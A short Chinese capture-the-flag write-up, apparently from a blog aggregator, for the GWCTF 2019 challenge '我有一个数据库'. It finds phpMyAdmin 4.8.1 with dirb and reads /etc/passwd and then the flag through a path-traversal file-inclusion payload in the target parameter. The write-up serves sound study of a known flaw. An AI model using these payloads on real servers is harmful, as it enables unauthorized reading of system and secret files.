[GWCTF 2019]我有一个数据库

知识点

phpmyadmin任意文件读取

dirb扫描到后台有phpmyadmin目录，访问一下

[GWCTF 2019]我有一个数据库

版本为4.81，经查询，存在远程文件读取漏洞

直接上payload读取passwd文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

[GWCTF 2019]我有一个数据库

读取成功，尝试读取flag文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

[GWCTF 2019]我有一个数据库

参考
phpMyAdmin 4.8.x 本地文件包含漏洞利用
 phpmyadmin 4.8.1 远程文件包含漏洞

相关文章：

2022-12-23
2022-02-06
2021-04-12
2022-12-23
2021-11-28
2022-12-23
2021-09-22

猜你喜欢

2021-06-24
2021-06-23
2022-12-23
2022-12-23
2022-12-23

相关资源

下载 2021-06-05
下载 2022-12-12
下载 2022-12-28
下载 2021-06-05

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode